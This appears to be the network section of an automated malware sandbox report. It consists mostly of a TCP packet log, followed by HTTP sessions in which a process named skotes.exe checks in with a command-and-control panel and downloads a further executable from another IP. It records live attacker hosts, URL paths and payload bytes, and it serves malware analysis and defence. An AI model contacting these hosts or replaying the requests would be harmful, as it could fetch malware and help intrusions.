                                                      Nov 30, 2024 18:08:45.375319958 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.375555992 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.375614882 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.376322985 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.376364946 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.376584053 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.376622915 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.377429962 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.377470016 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.377655029 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.377693892 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.378473043 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.378510952 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.378724098 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.378762960 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.379549980 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.379590988 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.379757881 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.379797935 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.380526066 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.380579948 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.380832911 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.380875111 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.381594896 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.381635904 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.381860018 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.381897926 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.382652044 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.382692099 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.382936954 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.382973909 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.383785963 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.383824110 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.384035110 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.384100914 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.384768009 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.384808064 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.385023117 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.385071993 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.385835886 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.385871887 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.386084080 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.386121035 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.386894941 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.386950016 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.387132883 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.387175083 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.387948036 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.387995005 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.388230085 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.388267994 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.388977051 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.389019012 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.389270067 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.389309883 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.390064001 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.390105009 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.390296936 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.390335083 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.391076088 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.391115904 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.391352892 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.391392946 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.392211914 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.392252922 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.392450094 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.392488003 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.393222094 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.393260956 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.393481016 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.393523932 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.394292116 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.394330978 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.394504070 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.394541979 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.395349026 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.395390987 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.395589113 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.395626068 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.396361113 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.396405935 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.396605015 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.396645069 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.398296118 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.398336887 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.398473024 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.398514032 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.398799896 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.398812056 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.398848057 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.398864985 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.474353075 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.474430084 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.474658012 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.474706888 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.474833012 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.474875927 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.475208998 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.475255966 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.475722075 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.475766897 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.475773096 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.475812912 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.476072073 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.476114035 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.476650000 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.476730108 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.477052927 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.477094889 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.477858067 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.477902889 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.477993965 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.478037119 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.478725910 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.478761911 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.478928089 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.478971004 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.479770899 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.479804993 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.480122089 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.480158091 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.480987072 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.481026888 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.481101036 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.481134892 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.481957912 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.482002020 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.482189894 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.482232094 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.483141899 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.483182907 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.483282089 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.483330011 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.483985901 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.484036922 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.484200001 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.484245062 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.485064983 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.485116005 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.485270023 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.485313892 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.486272097 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.486310005 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.486439943 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.486478090 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.487273932 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.487327099 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.487432003 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.487474918 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.488476038 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.488517046 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.488656998 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.488698006 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.489300966 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.489341974 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.489485025 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.489526033 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.490319014 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.490362883 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.490557909 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.490598917 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.491671085 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.491714001 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.491858959 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.491899967 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.494019032 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.494033098 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.494045019 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.494057894 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.494070053 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.494093895 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.494549036 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.494590044 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.494839907 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.494888067 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.495594025 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.495632887 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.495899916 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.495939970 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.496757984 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.496799946 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.496857882 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.496898890 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.497689009 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.497728109 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.497900009 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.497937918 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.499880075 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.499891043 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.499902010 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.499926090 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.499959946 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.500077009 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.500114918 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.500869036 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.500906944 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.501065016 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.501100063 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.502031088 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.502073050 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.502197981 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.502234936 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.503328085 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.503346920 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.503376961 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.503393888 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.504023075 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.504067898 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.504241943 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.504283905 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.505099058 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.505146027 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.505292892 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.505330086 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.506154060 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.506198883 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.506328106 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.506365061 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.507210016 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.507247925 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.507383108 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.507421017 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.508248091 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.508281946 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:45.508428097 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:45.508464098 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:46.024075985 CET497857000192.168.2.4179.43.171.209
                                                      Nov 30, 2024 18:08:46.146028996 CET700049785179.43.171.209192.168.2.4
                                                      Nov 30, 2024 18:08:46.447979927 CET700049785179.43.171.209192.168.2.4
                                                      Nov 30, 2024 18:08:46.449937105 CET497857000192.168.2.4179.43.171.209
                                                      Nov 30, 2024 18:08:46.575958014 CET700049785179.43.171.209192.168.2.4
                                                      Nov 30, 2024 18:08:46.696424007 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:46.696721077 CET4985080192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:46.816740036 CET8049850185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:46.816896915 CET4985080192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:46.816929102 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:46.816977024 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:46.817097902 CET4985080192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:46.937020063 CET8049850185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:48.267802000 CET8049850185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:48.267867088 CET4985080192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:50.808099985 CET4982080192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:50.808379889 CET4986080192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:50.928595066 CET8049860185.215.113.43192.168.2.4
                                                      Nov 30, 2024 18:08:50.928653955 CET4986080192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:50.928788900 CET8049820185.215.113.43192.168.2.4
                                                      Nov 30, 2024 18:08:50.928807974 CET4986080192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:50.928836107 CET4982080192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:51.055356979 CET8049860185.215.113.43192.168.2.4
                                                      Nov 30, 2024 18:08:54.174046040 CET700049785179.43.171.209192.168.2.4
                                                      Nov 30, 2024 18:08:54.226694107 CET497857000192.168.2.4179.43.171.209
                                                      Nov 30, 2024 18:08:54.929960012 CET4986080192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:09:00.195641994 CET497857000192.168.2.4179.43.171.209
                                                      Nov 30, 2024 18:09:00.316466093 CET700049785179.43.171.209192.168.2.4
                                                      Nov 30, 2024 18:09:00.618246078 CET700049785179.43.171.209192.168.2.4
                                                      Nov 30, 2024 18:09:00.664311886 CET497857000192.168.2.4179.43.171.209
                                                      Nov 30, 2024 18:09:00.664462090 CET497857000192.168.2.4179.43.171.209
                                                      Nov 30, 2024 18:09:00.785449028 CET700049785179.43.171.209192.168.2.4
                                                      • 185.215.113.43
                                                      • 31.41.244.11
                                                      • 185.215.113.16
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449753185.215.113.43802640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 30, 2024 18:08:04.587791920 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449769185.215.113.43802640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 30, 2024 18:08:10.222976923 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 154
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 45 37 33 42 34 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB42E73B45C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                      Nov 30, 2024 18:08:12.515664101 CET1082INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Sat, 30 Nov 2024 17:08:12 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 33 37 62 0d 0a 20 3c 63 3e 31 30 31 30 36 39 38 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 61 32 37 63 30 31 35 31 65 65 64 30 30 62 35 31 62 31 30 30 33 35 36 62 39 63 61 63 31 31 35 62 63 61 31 39 61 35 35 33 36 65 36 23 31 30 31 30 37 30 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 61 32 37 63 30 31 35 31 65 65 64 30 30 62 35 31 62 31 30 30 33 37 30 62 32 65 64 62 36 30 30 61 31 66 35 39 61 35 35 33 36 65 36 23 31 30 31 30 37 31 34 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 30 37 31 35 30 30 31 2b 2b 2b 66 63 38 66 37 63 [TRUNCATED]
                                                      Data Ascii: 37b <c>1010698001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9a27c0151eed00b51b100356b9cac115bca19a5536e6#1010706001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9a27c0151eed00b51b100370b2edb600a1f59a5536e6#1010714001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1010715001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1010716001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1010717001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1010718001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1010719001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1010720001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#<d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.44977531.41.244.11802640C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 30, 2024 18:08:12.643426895 CET66OUTGET /files/1824233174/cAvEmnl.exe HTTP/1.1
                                                      Host: 31.41.244.11
                                                      Nov 30, 2024 18:08:14.041142941 CET1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Sat, 30 Nov 2024 17:08:13 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 52736
                                                      Last-Modified: Sat, 30 Nov 2024 15:47:02 GMT
                                                      Connection: keep-alive
                                                      ETag: "674b3376-ce00"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 30 4b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 8a 00 00 00 40 00 00 00 00 00 00 0a 60 00 00 00 60 00 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 94 00 00 57 00 00 00 00 20 01 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
